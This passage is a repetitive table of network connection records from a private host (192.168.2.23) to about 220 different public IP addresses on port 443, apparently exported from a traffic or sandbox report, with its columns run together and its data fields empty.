                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13170192.168.2.235696236.208.20.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13171192.168.2.235507444.183.111.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13172192.168.2.233997649.51.14.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13173192.168.2.2339318159.24.218.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13174192.168.2.23376085.187.3.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13175192.168.2.2356640103.250.89.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13176192.168.2.2338270160.114.129.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13177192.168.2.2342250192.74.137.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13178192.168.2.2334710184.213.243.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13179192.168.2.2348864194.138.16.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13180192.168.2.2349284194.215.185.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13181192.168.2.2340248137.227.3.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13182192.168.2.2338126217.133.128.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13183192.168.2.2344476221.176.159.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13184192.168.2.2350660220.23.106.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13185192.168.2.234978437.82.42.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13186192.168.2.2339274193.102.194.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13187192.168.2.2349544169.139.214.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13188192.168.2.233768875.236.187.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13189192.168.2.2357460194.90.25.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13190192.168.2.234627453.5.158.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13191192.168.2.2353070143.158.108.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13192192.168.2.2356092171.204.39.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13193192.168.2.2335482123.103.160.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13194192.168.2.2360616114.51.95.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13195192.168.2.2358788145.152.231.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13196192.168.2.2340734103.184.73.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13197192.168.2.235747093.88.198.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13198192.168.2.2343118134.178.247.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13199192.168.2.2336462122.93.242.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13200192.168.2.2334546115.238.98.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13201192.168.2.235588693.156.39.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13202192.168.2.2348160172.34.34.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13203192.168.2.235884248.100.29.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13204192.168.2.2344266163.167.66.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13205192.168.2.235823694.152.148.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13206192.168.2.235792084.161.109.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13207192.168.2.23596604.128.174.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13208192.168.2.234728649.180.42.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13209192.168.2.2347058125.255.99.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13210192.168.2.235999248.53.20.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13211192.168.2.236029884.138.71.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13212192.168.2.234059873.108.100.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13213192.168.2.233637231.196.107.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13214192.168.2.234377252.195.138.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13215192.168.2.235796682.148.120.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13216192.168.2.2336950171.136.180.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13217192.168.2.235705076.150.17.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13218192.168.2.2353428136.161.253.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13219192.168.2.234195667.68.242.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13220192.168.2.2359042179.140.106.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13221192.168.2.235697643.111.141.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13222192.168.2.2354798122.154.42.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13223192.168.2.2355448186.136.3.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13224192.168.2.2336056171.32.230.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13225192.168.2.2336322155.126.84.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13226192.168.2.2345478136.230.15.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13227192.168.2.2355492158.149.118.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13228192.168.2.2359932123.155.89.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13229192.168.2.2354518119.204.160.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13230192.168.2.235747673.21.178.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13231192.168.2.235298895.110.7.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13232192.168.2.2343020134.186.238.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13233192.168.2.235375665.231.250.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13234192.168.2.2356584217.166.5.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13235192.168.2.234839485.38.153.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13236192.168.2.2355812196.172.115.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13237192.168.2.234108441.112.170.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13238192.168.2.2346168150.111.188.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13239192.168.2.2345364205.198.233.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13240192.168.2.233930467.144.250.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13241192.168.2.234785471.138.92.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13242192.168.2.2353240142.25.63.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13243192.168.2.233937084.253.221.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13244192.168.2.233661819.240.74.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13245192.168.2.2338622206.58.47.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13246192.168.2.234117438.41.80.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13247192.168.2.235832031.43.135.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13248192.168.2.2354126223.160.226.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13249192.168.2.2342848196.244.166.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13250192.168.2.2340376139.214.180.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13251192.168.2.23575584.111.61.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13252192.168.2.2346358116.48.193.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13253192.168.2.2348810113.22.77.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13254192.168.2.2353340174.98.93.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13255192.168.2.2351692216.102.34.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13256192.168.2.234036637.221.159.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13257192.168.2.233355844.194.134.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13258192.168.2.2351028142.7.52.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13259192.168.2.234594289.100.79.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13260192.168.2.2343958110.229.85.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13261192.168.2.2338310105.100.151.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13262192.168.2.2348668131.130.99.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13263192.168.2.235988666.193.95.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13264192.168.2.2351834124.206.129.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13265192.168.2.2339988118.21.91.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13266192.168.2.2344948108.246.248.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13267192.168.2.2351162109.226.103.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13268192.168.2.234510091.99.233.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13269192.168.2.2357956199.199.236.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13270192.168.2.2340230154.182.236.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13271192.168.2.235721443.189.243.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13272192.168.2.2334136186.152.79.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13273192.168.2.234214619.30.37.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13274192.168.2.2355572181.206.158.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13275192.168.2.234275098.49.22.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13276192.168.2.2360220178.55.71.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13277192.168.2.235949250.208.49.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13278192.168.2.235042659.68.17.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13279192.168.2.2358730155.206.34.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13280192.168.2.233378265.91.61.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13281192.168.2.234595491.120.93.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13282192.168.2.2353488130.162.226.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13283192.168.2.2341602191.82.75.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13284192.168.2.2335840123.231.214.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13285192.168.2.2333530195.1.212.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13286192.168.2.234906642.53.243.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13287192.168.2.2350440107.81.245.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13288192.168.2.2338968141.12.107.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13289192.168.2.235378457.78.61.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13290192.168.2.2347672191.129.249.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13291192.168.2.2334332189.164.43.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13292192.168.2.2360362135.195.159.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13293192.168.2.2346090156.221.39.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13294192.168.2.2349820190.103.116.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13295192.168.2.2357590192.212.137.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13296192.168.2.233646619.243.109.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13297192.168.2.2345192204.250.237.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13298192.168.2.2351602197.86.22.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13299192.168.2.2351388165.217.194.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13300192.168.2.2341062157.233.127.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13301192.168.2.2346176148.235.203.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13302192.168.2.234695890.33.57.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13303192.168.2.234027435.123.26.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13304192.168.2.235550041.219.113.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13305192.168.2.2340840155.132.127.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13306192.168.2.233757095.87.120.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13307192.168.2.235782835.79.227.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13308192.168.2.233494260.56.249.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13309192.168.2.234794693.149.235.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13310192.168.2.2344762166.243.149.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13311192.168.2.2351514191.53.60.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13312192.168.2.235049831.163.114.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13313192.168.2.235911092.167.169.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13314192.168.2.2347656185.212.27.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13315192.168.2.2357764178.138.198.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13316192.168.2.236097496.224.35.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13317192.168.2.2336562119.223.181.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13318192.168.2.234189088.225.165.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13319192.168.2.234462485.62.124.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13320192.168.2.2350018152.117.241.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13321192.168.2.235909491.116.3.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13322192.168.2.2359504192.67.59.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13323192.168.2.2335080207.183.89.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13324192.168.2.2339060208.183.34.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13325192.168.2.2358802154.90.246.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13326192.168.2.2357524114.242.3.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13327192.168.2.2346202219.40.152.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13328192.168.2.2351616102.206.173.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13329192.168.2.2360444142.101.138.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13330192.168.2.2341648145.136.217.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13331192.168.2.2354858134.245.43.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13332192.168.2.2346438201.126.233.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13333192.168.2.235621436.218.77.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13334192.168.2.2351550197.208.66.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13335192.168.2.235437068.82.167.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13336192.168.2.235002895.220.200.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13337192.168.2.2334714211.206.233.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13338192.168.2.2350924182.140.27.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13339192.168.2.2357772183.203.253.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13340192.168.2.2338010157.196.137.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13341192.168.2.2349898153.63.8.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13342192.168.2.2333508136.216.71.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13343192.168.2.2349616168.94.180.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13344192.168.2.2356582140.16.7.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13345192.168.2.235874897.172.181.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13346192.168.2.235104875.149.161.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13347192.168.2.235658832.251.196.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13348192.168.2.233522065.171.78.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13349192.168.2.234998097.12.95.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13350192.168.2.234983043.17.127.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13351192.168.2.2335106107.247.101.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13352192.168.2.2337678174.94.81.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13353192.168.2.235869460.84.99.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13354192.168.2.234400099.80.77.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13355192.168.2.2338178133.41.181.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13356192.168.2.2333146140.36.25.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13357192.168.2.2343416148.28.232.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13358192.168.2.234102668.217.45.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13359192.168.2.2349288126.224.204.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13360192.168.2.235207085.198.39.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13361192.168.2.2356680112.20.73.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13362192.168.2.234794462.54.90.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13363192.168.2.2360244200.12.21.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13364192.168.2.2339166129.54.69.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13365192.168.2.2349044183.193.90.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13366192.168.2.234895491.32.17.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13367192.168.2.2351776194.167.118.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13368192.168.2.2336100189.121.138.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13369192.168.2.2334990145.218.32.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13370192.168.2.2355840111.142.103.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13371192.168.2.2355424212.253.98.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13372192.168.2.233831649.153.234.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13373192.168.2.234505281.20.89.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13374192.168.2.234181264.92.153.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13375192.168.2.236056083.143.45.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13376192.168.2.2352962105.236.157.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13377192.168.2.234012272.67.113.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13378192.168.2.2355816118.24.51.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13379192.168.2.2333522149.230.45.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13380192.168.2.2339360210.146.136.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13381192.168.2.234671653.245.94.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13382192.168.2.234676670.40.15.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13383192.168.2.2339938151.162.15.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13384192.168.2.2349876159.109.196.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13385192.168.2.235024823.4.10.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13386192.168.2.2350354210.60.130.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13387192.168.2.2344568106.228.203.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13388192.168.2.234303292.203.117.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13389192.168.2.234288670.47.254.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13390192.168.2.2337446154.106.77.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13391192.168.2.2338504166.136.33.246443
